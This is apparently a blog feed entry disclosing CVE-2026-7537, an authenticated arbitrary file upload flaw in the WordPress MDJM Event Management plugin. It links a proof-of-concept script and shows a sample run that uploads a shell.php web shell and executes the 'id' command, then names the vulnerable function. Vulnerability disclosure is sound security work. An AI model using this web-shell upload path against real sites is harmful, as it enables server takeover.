https://ryankozak.com/tags/mdjm-event-management/ Recent content in MDJM Event Management on Hugo en-us Fri, 05 Jun 2026 00:01:00 +0000 https://ryankozak.com/posts/cve-2026-7537/ Fri, 05 Jun 2026 00:01:00 +0000 https://ryankozak.com/posts/cve-2026-7537/ <h3 id="cve-2026-7537">CVE-2026-7537</h3> <p>The WordPress <a href="https://wordpress.org/plugins/mobile-dj-manager/" target="_blank">MDJM Event Management</a> plugin (version 1.7.8.3 and prior) contains an arbitrary file upload vulnerability that allows authenticated administrators to upload malicious PHP files to the server, potentially leading to remote code execution.</p> <h2 id="tldr-exploits">TL;DR Exploits</h2> <p>A POC <a href="https://github.com/d0n601/CVE-2026-7537/blob/master/CVE-2026-7537.py" target="_blank">CVE-2026-7537.py</a> is provided to demonstrate an authenticated attacker uploading shell.php and executing remote code:</p> <pre tabindex="0"><code>python3 ./CVE-2026-7537.py http://target-site.com admin password123 [+] Logging into: http://target-site.com/wp-admin [+] Extracting nonce values... [+] Uploading web shell: shell.php [+] Web Shell Location: http://target-site.com/wp-content/uploads/2026/02/shell.php [+] [+] Executing test command: id uid=33(www-data) gid=33(www-data) groups=33(www-data) </code></pre><h2 id="technical-description">Technical Description</h2> <p>The vulnerability exists in the <code>mdjm_send_comm_email()</code> function in the communications feature. The upload functionality lacks proper file validation while processing file attachments for email communications. This allows authenticated users with the <code>mdjm_comms_send</code> capability (administrators and MDJM admins by default) to upload arbitrary files, including PHP files that can be executed on the server.</p>